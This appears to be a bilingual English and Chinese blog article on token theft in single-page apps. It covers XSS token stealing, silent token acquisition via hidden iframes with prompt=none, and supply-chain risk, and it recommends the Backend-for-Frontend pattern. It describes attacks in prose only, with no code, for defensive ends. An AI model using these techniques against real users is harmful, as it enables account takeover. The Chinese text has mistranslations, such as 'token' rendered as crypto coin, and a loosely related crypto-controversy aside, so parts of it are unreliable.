後端換前端、令牌盜竊和安全：在現代 Web 應用程序的危險水域中航行

探索單頁應用程序 (SPA) 中的安全挑戰以及後端換前端 (BFF) 模式如何提供針對令牌盜竊和 XSS 攻擊的強大解決方案。

In the ever-evolving landscape of web application security, staying ahead of threats is paramount. The dynamics around Backend-for-Frontend (BFF), token theft, and overall security are constantly shifting, demanding a proactive approach.

在不斷發展的 Web 應用程序安全領域，保持領先地位至關重要。後端換前端 (BFF)、令牌盜竊和整體安全性的動態不斷變化，需要採取積極主動的方法。

The SPA Security Paradox

SPA 安全悖論

Single-Page Applications (SPAs) have revolutionized user experience with their speed and interactivity. However, this progress introduces a critical security challenge: securely storing access tokens in the browser. Unlike traditional server-side applications, SPAs rely on storing tokens in the browser, making them vulnerable to attacks like Cross-Site Scripting (XSS).

單頁應用程序 (SPA) 以其速度和交互性徹底改變了用戶體驗。然而，這一進展帶來了一個關鍵的安全挑戰：在瀏覽器中安全地存儲訪問令牌。與傳統的服務器端應用程序不同，SPA 依賴於在瀏覽器中存儲令牌，這使得它們容易受到跨站點腳本 (XSS) 等攻擊。

The Problem: Tokens in the Frontend

問題：前端的令牌

SPAs, being "public clients," can't securely store secrets. Storing tokens in localStorage, sessionStorage, or memory exposes them to XSS attacks. Malicious code can easily access and exfiltrate these tokens, granting attackers full account access.

SPA 作為“公共客戶”，無法安全地存儲秘密。將令牌存儲在 localStorage、sessionStorage 或內存中會使它們遭受 XSS 攻擊。惡意代碼可以輕鬆訪問和竊取這些令牌，從而授予攻擊者完全帳戶訪問權限。

Attack Vectors: Single-Execution and Persistent Token Theft

攻擊向量：單次執行和持續令牌盜竊

Attackers employ various methods. Single-execution token theft involves JavaScript code scanning storage locations for tokens. Persistent token theft continuously steals tokens, even bypassing refresh token rotation by acting as a "heartbeat signal" to avoid detection.

攻擊者採用各種方法。單次執行令牌盜竊涉及 JavaScript 代碼掃描令牌的存儲位置。持續的令牌盜竊會不斷竊取令牌，甚至通過充當“心跳信號”來繞過刷新令牌輪換以避免檢測。

Defensive Measures and Their Limitations

防禦措施及其局限性

While short token lifespans and refresh token rotation offer some protection, they're not foolproof. Persistent token theft, in particular, can circumvent these measures. Current OAuth2 guidelines suggest in-memory storage with web worker sandboxing, but even this has limitations.

雖然較短的令牌生命週期和刷新令牌輪換提供了一些保護，但它們並不是萬無一失的。特別是持續的代幣盜竊可以規避這些措施。當前的 OAuth2 指南建議使用 Web Worker 沙箱進行內存存儲，但即使這樣也有局限性。

Acquisition of New Tokens: Bypassing Token Storage Altogether

獲取新代幣：完全繞過代幣存儲

A particularly insidious attack involves attackers initiating their own Authorization Code Flow using hidden iframes, exploiting the user's active session with the token provider. The prompt=none parameter enables silent authentication, making it difficult to distinguish from legitimate requests.

一種特別陰險的攻擊涉及攻擊者使用隱藏的 iframe 啟動自己的授權代碼流，利用用戶與令牌提供商的活動會話。 Prompt=none 參數啟用靜默身份驗證，使其難以與合法請求區分開。

The Backend-for-Frontend (BFF) Pattern: A Robust Solution

後端換前端 (BFF) 模式：穩健的解決方案

The Backend-for-Frontend (BFF) pattern offers a compelling solution by moving token management back to the server. This approach mitigates the risks associated with storing tokens in the browser, enhancing security without sacrificing the benefits of SPAs.

後端換前端 (BFF) 模式通過將令牌管理移回服務器來提供引人注目的解決方案。這種方法降低了與在瀏覽器中存儲令牌相關的風險，增強了安全性，同時又不犧牲 SPA 的優勢。

The Persistent Threat of XSS: A Reality Check

XSS 的持續威脅：現實檢驗

Despite advancements in browser security and developer awareness, XSS remains a significant threat. Modern attacks exploit new vectors, bypassing traditional protective measures. Supply chain attacks, compromised browser extensions, and DOM-based attacks are particularly concerning.

儘管瀏覽器安全性和開發人員意識有所進步，XSS 仍然是一個重大威脅。現代攻擊利用新的載體，繞過傳統的保護措施。供應鏈攻擊、受損的瀏覽器擴展和基於 DOM 的攻擊尤其令人擔憂。

Supply Chain Attacks: The Silent Epidemic

供應鏈攻擊：無聲的流行病

Modern SPAs integrate hundreds of npm packages, making them vulnerable to supply chain attacks. A single compromised package can lead to complete code execution in the browser. Content Security Policy (CSP) can't distinguish between legitimate and compromised packages, exacerbating the risk.

現代 SPA 集成了數百個 npm 包，使其容易受到供應鏈攻擊。單個受感染的包可能會導致瀏覽器中完整的代碼執行。內容安全策略 (CSP) 無法區分合法包和受損包，從而加劇了風險。

Ocean Protocol Controversy: A Reminder of Governance and Transparency

海洋協議爭議：治理和透明度的提醒

The recent dispute involving Ocean Protocol Foundation, Fetch.ai, and SingularityNET underscores the importance of governance and transparency in cryptocurrency alliances. Allegations of token misuse and fund mismanagement highlight the potential risks and challenges in decentralized ecosystems.

最近涉及海洋協議基金會、Fetch.ai 和 SingularityNET 的糾紛凸顯了加密貨幣聯盟中治理和透明度的重要性。對代幣濫用和資金管理不善的指控凸顯了去中心化生態系統的潛在風險和挑戰。

While the Berachain network restart due to a Balancer V2 vulnerability might seem unrelated, it's another piece of the puzzle. These events highlight the need for continuous vigilance and robust security practices.

雖然由於 Balancer V2 漏洞而導致的 Berachain 網絡重啟似乎無關，但這是另一個難題。這些事件凸顯了持續保持警惕和強有力的安全實踐的必要性。

Final Thoughts

最後的想法

The world of web application security is a wild ride, isn't it? From SPA vulnerabilities to crypto controversies, there's always something new to keep us on our toes. Staying informed, adopting best practices like the BFF pattern, and maintaining a healthy dose of skepticism are key to navigating these treacherous waters. So, keep your wits about you, and let's build a more secure digital future, one line of code at a time!

Web 應用程序安全的世界是一場瘋狂的旅程，不是嗎？從 SPA 漏洞到加密貨幣爭議，總有一些新事物讓我們保持警惕。及時了解情況、採用 BFF 模式等最佳實踐以及保持適當的懷疑態度是應對這些危險水域的關鍵。因此，請保持警惕，讓我們一次一行代碼構建一個更安全的數字未來！